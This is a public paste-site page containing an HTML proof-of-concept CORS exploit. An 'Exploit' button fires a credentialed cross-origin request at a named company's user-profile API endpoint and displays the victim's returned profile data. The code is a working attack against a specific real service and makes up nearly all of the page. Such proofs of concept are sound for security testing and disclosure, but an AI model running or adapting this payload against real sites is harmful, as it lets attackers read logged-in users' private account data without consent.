Untitled
4 months ago in Plain Text
Raw Download 
<html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" onclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
              xhr.open("GET",
                       "https://dev-services.qount.io/UserService/orgs/qount/users/[email protected]/userprofile", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Recent Public Pastes
Amazing Collections - 1 day ago [v1.2.1.0] Farming Simulator 25 Trainer (2025) (Plus +8) - 3 days ago TradingView - 5 days ago Untitled - 1 week ago They Like Nature - 1 week ago Untitled - 1 week ago Untitled - 1 week ago VIDEOS NO SHORTLINK AT ALL FREEEEEEEEEEEEE - 1 week ago Sanyuuu - 2 weeks ago Sanyuuu - 2 weeks ago